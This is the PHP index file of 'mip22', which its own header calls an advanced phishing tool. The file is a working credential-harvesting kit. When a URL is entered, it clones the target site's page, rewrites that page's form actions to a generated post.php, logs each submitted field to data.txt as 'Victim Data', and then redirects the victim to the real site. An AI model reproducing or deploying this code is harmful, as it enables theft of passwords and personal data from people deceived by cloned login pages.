index.php 4.7 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168169170171172173174175176177178179180181182183184185186187188189190191192193194195196197198199200201202203204205206207208209210211212213214215216217218219220221222223224225226227228229230231232233234235236237238
  1. <?php
  2. /*
  3. * Copyright (c) 2022 Barchampas Gerasimos <makindosxx@gmail.com>.
  4. * mip22 is a advanced phishing tool.
  5. *
  6. * mip22 is free software: you can redistribute it and/or modify
  7. * it under the terms of the GNU Affero General Public License as published by
  8. * the Free Software Foundation, either version 3 of the License, or
  9. * (at your option) any later version.
  10. *
  11. * mip22 is distributed in the hope that it will be useful,
  12. * but WITHOUT ANY WARRANTY; without even the implied warranty of
  13. * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
  14. * GNU Affero General Public License for more details.
  15. *
  16. * You should have received a copy of the GNU Affero General Public License
  17. * along with this program. If not, see <http://www.gnu.org/licenses/>.
  18. *
  19. */
  20. ini_set('display_errors', 1);
  21. ini_set('display_startup_errors', 1);
  22. error_reporting(E_ALL);
  23. ?>
  24. <html>
  25. <head>
  26. <title> Mip22 </title>
  27. <link rel="icon" type="image/jpg" href="/css/icons/logo.png" />
  28. <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
  29. <meta http-equiv="Pragma" content="no-cache" />
  30. <meta http-equiv="Expires" content="0" />
  31. <meta name="viewport" content="width=device-width, initial-scale=1.0">
  32. <style>
  33. body
  34. {
  35. background-image: url("img/back2.jpeg");
  36. background-repeat: no-repeat;
  37. background-size: auto;
  38. }
  39. #site
  40. {
  41. height:3em;
  42. width: 25em;
  43. margin: 0 auto;
  44. border: 1px solid black;
  45. border-radius: 10px;
  46. font-size: 15px;
  47. text-align:center;
  48. }
  49. #butt
  50. {
  51. height:2.5em;
  52. width: 25em;
  53. background-color: e74f5b;
  54. color: white;
  55. margin: 0 auto;
  56. border: 1px solid black;
  57. border-radius: 10px;
  58. font-size: 15px;
  59. }
  60. #butt:hover
  61. {
  62. height:2.5em;
  63. width: 25em;
  64. background-color: red;
  65. color: white;
  66. margin: 0 auto;
  67. border: 1px solid black;
  68. border-radius: 10px;
  69. }
  70. @import url('https://fonts.googleapis.com/css?family=Suez+One');
  71. #text{
  72. font-family: "Suez One", serif;
  73. font-weight: bold;
  74. text-align: center;
  75. font-size: 35px;
  76. color: rgb(255, 0, 34);
  77. background-color: rgba(0, 0, 0, 0);
  78. text-shadow: rgb(0, 0, 0) 2px 2px 2px;
  79. }
  80. </style>
  81. </head>
  82. <body>
  83. <div align="center">
  84. <br>
  85. <font size="7">
  86. <span id="text"> Mip22 <br> Missions Impossibles </span>
  87. </font>
  88. <br>
  89. <img src="img/logo.png" height="250px" width="250px"
  90. style="background-color:transparent;">
  91. <form action="" method="post" >
  92. <input type="text" name="site_hack" minlength="7" maxlength="256" placeholder="Enter a web site ec: http(s)://www.website.com"
  93. id="site" required>
  94. <br>
  95. <br>
  96. <input type="submit" name="hack" value="Hack this site" id="butt">
  97. </form>
  98. </div>
  99. </body>
  100. </html>
  101. <?php
  102. require_once('__SRC__/class_tools.php');
  103. if (class_exists('INPUT_DATA_AVAILABLE'))
  104. {
  105. $obj_data = new INPUT_DATA_AVAILABLE;
  106. if(isset($_POST['hack']))
  107. {
  108. $site_hack = $obj_data-> SAFE_DATA_ENTER($_POST['site_hack']);
  109. $site_name = "index";
  110. $url = $site_hack;
  111. $name = $site_name.'.html';
  112. $file = file($url);
  113. $result = file_put_contents($name, $file);
  114. chmod("index.html", 0777);
  115. $post_data_txt = fopen("data.txt", "w") or die("Unable to open file!");
  116. $lines_data_txt = PHP_EOL;
  117. fwrite($post_data_txt, $lines_data_txt);
  118. fclose($post_data_txt);
  119. chmod("data.txt", 0777);
  120. $post_file_php = fopen("post.php", "w") or die("Unable to open file!");
  121. $lines_php = '<?php $file = "data.txt";' .PHP_EOL
  122. .'file_put_contents($file, print_r('."'$site_hack Victim Data \n'".', true), FILE_APPEND);' .PHP_EOL
  123. .'file_put_contents($file, print_r($_POST, true), FILE_APPEND);' .PHP_EOL
  124. . 'file_put_contents($file, print_r("Array_end\n\n", true), FILE_APPEND);' .PHP_EOL
  125. .'?>'
  126. .PHP_EOL
  127. ."<meta http-equiv='refresh' content='0; url=$site_hack'/>";
  128. fwrite($post_file_php, $lines_php);
  129. fclose($post_file_php);
  130. chmod("post.php", 0777);
  131. $path_to_file = 'index.html';
  132. $file_contents = file_get_contents($path_to_file);
  133. $file_contents = str_replace('action="','action="post.php" " ',$file_contents);
  134. file_put_contents($path_to_file,$file_contents);
  135. echo "<div align='center'>
  136. <br>
  137. <font size='4' color='red' style='background-color:white;'>
  138. The website $site_hack hack successfully </font>
  139. <br>
  140. <font size='4' color='red' style='background-color:white;'>
  141. Return to terminal and continue the attack. </font>
  142. </div>";
  143. #echo '<script type="text/javascript">alert("The website hack successfully");
  144. # </script>';
  145. #echo ("<script>location.href='http://127.0.0.1:8080'</script>");
  146. } // end of isset
  147. } // end of if exists class tools
  148. ?>